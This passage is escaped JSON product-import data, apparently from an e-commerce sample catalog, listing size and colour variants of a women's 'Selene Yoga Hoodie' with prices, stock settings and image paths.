\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"1052\":{\"sku\":\"WH05-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-M-Orange\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1053\":{\"sku\":\"WH05-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-M-Purple\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1054\":{\"sku\":\"WH05-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-M-White\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1055\":{\"sku\":\"WH05-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-L-Orange\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1056\":{\"sku\":\"WH05-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-L-Purple\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1057\":{\"sku\":\"WH05-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-L-White\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh05-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1058\":{\"sku\":\"WH05-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-XL-Orange\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1059\":{\"sku\":\"WH05-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-XL-Purple\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1060\":{\"sku\":\"WH05-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Selene Yoga Hoodie-XL-White\",\"description\":\"<p>The Selene Yoga Hoodie gets you to and from the studio in semi form-fitted comfort. Snug, sleek contours add fashion to function in this free-moving yoga warm up sweatshirt.<\\/p>\\n<p>&bull; Ivory heather full zip 3\\/4 sleeve hoodie.<br \\/>&bull; Zip pocket at arm for convenient storage.<br \\/>&bull; 24.0\\\" body length.<br \\/>&bull; 89% Polyester \\/ 11% Spandex.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"selene-yoga-hoodie-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_